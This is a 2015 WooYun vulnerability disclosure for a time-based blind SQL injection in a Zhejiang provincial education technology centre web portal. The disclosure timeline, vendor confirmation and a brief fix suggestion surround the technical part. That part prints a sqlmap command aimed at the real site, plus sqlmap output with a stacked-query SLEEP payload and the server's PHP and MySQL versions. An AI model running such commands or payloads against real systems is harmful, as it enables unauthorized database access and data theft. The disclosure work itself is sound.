当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125534

漏洞标题:浙江省教育技术中心SQL时间盲注

相关厂商:浙江省教育技术中心

漏洞作者: missy

提交时间:2015-07-09 12:47

修复时间:2015-08-23 21:50

公开时间:2015-08-23 21:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

详细说明:

sqlmap.py -u "http://yun.zjer.cn/index.php?id=*&r=studio/class/info&sid=163" -D portal --tables


1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://yun.zjer.cn:80/index.php?id=';(SELECT * FROM (SELECT(SLEEP(5)))BbQk)#&r=studio/class/info&sid=163
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.11
current database: 'portal'

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://yun.zjer.cn:80/index.php?id=';(SELECT * FROM (SELECT(SLEEP(5)))BbQk)#&r=studio/class/info&sid=163
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.11
current database: 'portal'

修复方案:

参数过滤

版权声明:转载请注明来源 missy@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-09 21:49

厂商回复:

感谢小伙伴的安全检测,厂商正在修复中

最新状态:

暂无